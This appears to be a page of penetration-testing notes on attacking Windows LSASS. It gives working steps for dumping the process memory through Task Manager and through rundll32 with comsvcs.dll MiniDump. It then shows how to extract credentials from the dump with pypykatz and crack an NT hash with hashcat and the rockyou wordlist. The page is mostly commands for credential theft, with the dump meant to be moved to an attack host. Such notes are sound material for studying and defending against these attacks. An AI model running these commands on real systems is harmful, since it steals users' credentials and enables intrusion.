Attacking LSASS

Dumping LSASS Process Memory

Task Manager Method

Open Task Manager > Select the Processes tab > Find & right click the Local Security Authority Process > Select Create dump file

A file called lsass.DMP is created and saved in:

C:\\Users\\loggedonusersdirectory\\AppData\\Local\\Temp

This is the file we will transfer to our attack host

Rundll32.exe & Comsvcs.dll Method

# Finding LSASS PID in cmd
# From cmd, we can issue the command tasklist /svc and find lsass.exe and its process ID in the PID field.
C:\\Windows\\system32> tasklist /svc

# Finding LSASS PID in PowerShell
# From PowerShell, we can issue the command Get-Process lsass and see the process ID in the Id field.
Get-Process lsass

# Creating lsass.dmp using PowerShell
rundll32 C:\\windows\\system32\\comsvcs.dll, MiniDump 672 C:\\lsass.dmp full

Using Pypykatz to Extract Credentials

# Running pypykatz 
pypykatz lsa minidump /home/peter/Documents/lsass.dmp

# Cracking the NT Hash with Hashcat
sudo hashcat -m 1000 64f12cddaa88057e06a81b54e73b949b /usr/share/wordlists/rockyou.txt

PreviousAttacking SAM NextAttacking Active Directory & NTDS.dit

Last updated 3 years ago